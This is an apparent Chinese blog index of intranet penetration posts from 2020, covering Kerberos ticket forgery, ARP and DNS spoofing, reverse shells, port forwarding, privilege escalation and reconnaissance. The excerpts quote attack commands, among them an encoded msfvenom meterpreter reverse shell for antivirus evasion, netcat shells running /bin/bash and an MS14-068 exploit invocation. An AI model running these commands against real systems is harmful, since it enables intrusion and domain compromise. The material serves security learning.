随笔分类 -  内网渗透

伪造白银票据
摘要:黄金票据是伪造 TGT,白银票据(Silver Ticket)是伪造 ST(Service Ticket),因为它不想黄金票据一样使用krbtgt账户的hash,而是使用计算机账户的hash进行加密的,所以只能获访问指定的权限。前提条件:域名称、域SID、域服务账户的hash、伪造的用户名(任意用户或者不存在的用户)制作白银票据 (上篇黄金票据已经截过图,主要使用用工具还是mimikatz和ps... 阅读全文
posted @ 2020-03-11 16:57 simon7s 阅读(847) 评论(0) 推荐(0)
伪造黄金票据(转)
摘要:第一个问题:如何证明你本人是XXX用户的问题 由Authentication Server负责第二个问题:提供服务的服务器如何知道你有权限访问它提供的服务。当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务。 由Ticket Granting Server负责针对Kerberos协议需要解决的第一个问题:如何证明你本人是XX... 阅读全文
posted @ 2020-03-11 16:50 simon7s 阅读(1196) 评论(0) 推荐(0)
kerberos协议
摘要:学习了解kerberos协议,有助于我们后期理解黄金票据和白银票据的原理kerberos协议介绍kerberos 是一种由MIT(麻省理工大学)提出的一种网络身份验证协议,它旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。kerberos协议中主要由三个角色:(1)访问服务的client(一下表述为Client或者用户)(2)提供服务的server(一下表述为服务)(3)KDC(K... 阅读全文
posted @ 2020-03-02 17:13 simon7s 阅读(646) 评论(0) 推荐(0)
DNS欺骗&嗅探监听
摘要:承接上一章,除了arp欺骗之外对的欺骗方法a)使用kali,对dns文件进行编辑使用的欺骗工具是ettercap。对dns文件编辑:添加一个A记录,解释到kali自身:b)进行欺骗通过命令行模式打开图形界面,选择Unified sniffing以中间人的方式进行嗅探选择网卡,开那个段上就选择那个段上的网卡选择dns_spoofc) 最后我们开始我们的dns欺骗,点击Start sniffing然后... 阅读全文
posted @ 2020-03-02 16:32 simon7s 阅读(693) 评论(0) 推荐(0)
linux下的ARP攻击(kali)
摘要:这是我的学习总结,刚入坑网络安全,写的不好或者有什么错误的希望大佬们指正 首先了解ARP的作用以及原理: ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP栈中的网络层,负责将某个ip地址解析成对应的MAC地址,ARP协议的基本功能就是通过目标设备的 阅读全文
posted @ 2020-03-02 15:38 simon7s 阅读(3109) 评论(0) 推荐(0)
隐匿攻击
摘要:免杀 msfvenom encoder编码器 -e 编码器 -i 编码次数 多次编码 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.172 lport=4444 -e x86/shikata_ga_nai -i 15 阅读全文
posted @ 2020-03-02 02:56 simon7s 阅读(225) 评论(0) 推荐(0)
跨边界传输之反弹shell
摘要:反弹shell 1.nc 正向连接 攻击机 nc-vv 受害者ip 受害者port 受害者 nc-lvvp受害者port - e /bin/bash 反向连接 攻击机 nc -lvvp 攻击机... 阅读全文
posted @ 2020-03-02 02:51 simon7s 阅读(776) 评论(0) 推荐(0)
跨边界传输之内网代理
摘要:内网代理 http tunnel reDuh reGeorg 1.python2 安装 urllib3库 2.上传tunnel.nosocket.php代理脚本到web服务器 3.访问url,确认web服务器删tunnel。nosocket.php能够执行 4.... 阅读全文
posted @ 2020-03-02 02:50 simon7s 阅读(214) 评论(0) 推荐(0)
跨边界传输之端口转发
摘要:端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 listen -listen <local por 阅读全文
posted @ 2020-03-02 02:45 simon7s 阅读(168) 评论(0) 推荐(0)
权限维持
摘要:3.权限维持 windows cmd命令 写webshell 1.使用cmd命令写webshell,带有以及“空格”的时候,需要使用^进行转义: 例如:echo ^ > shell.php linux cobaltstrike 生成后门 ... 阅读全文
posted @ 2020-03-02 02:28 simon7s 阅读(195) 评论(0) 推荐(0)
内网提权-服务篇
摘要:服务提权 UDF提权 windows UDF mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/ mysql版本>5.1 ,UDF导出到安静路径MYSQL/Lib/Plugin/ linux /usr/lib/mysql/plugin/ 要求有些权限,单引号 阅读全文
posted @ 2020-03-02 02:22 simon7s 阅读(215) 评论(0) 推荐(0)
内网提权-系统篇
摘要:windows 系统漏洞、ms系列 ms08-067 rpc ms09-012 pr.exe/巴西烤肉提权 ms09-020 iis5/6 ms12-202 rdp蓝屏 ms17-010 永恒... 阅读全文
posted @ 2020-03-02 02:14 simon7s 阅读(463) 评论(0) 推荐(0)
内网渗透之信息收集-linux
摘要:linux 系统信息 grep MemTotal /proc/meminfo #查看系统内存总量 cat /etc/issue #查看系统名称 cat /etc/lsb-release #查看系统名称、版本号 uname -a #查看内核信息 ls /root | grep vmlinuz #查看内 阅读全文
posted @ 2020-03-01 22:45 simon7s 阅读(549) 评论(0) 推荐(0)
内网渗透之信息收集-windows
摘要:用户相关query user #查看当前在线的用户whoami #查看当前用户net user #查看当前系统全部用户net1 user #查看当前系统全部用户(高权限命令)net user /domain #查看当前域全部用户net user administrator #查看admin用户详细信息net localgroup #查看本地用户组net localgroup administrat... 阅读全文
posted @ 2020-03-01 22:24 simon7s 阅读(272) 评论(0) 推荐(0)
MS14-068提权和impacket工具包提权
摘要:ms14-068提权工具利用a)拿下边界机win7,并已经有win7上任意一个账号的密码-u 用户名@域-p 用户密码-s 用户sid-d 域控ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com生成一个ccache后... 阅读全文
posted @ 2020-02-27 01:39 simon7s 阅读(804) 评论(0) 推荐(0)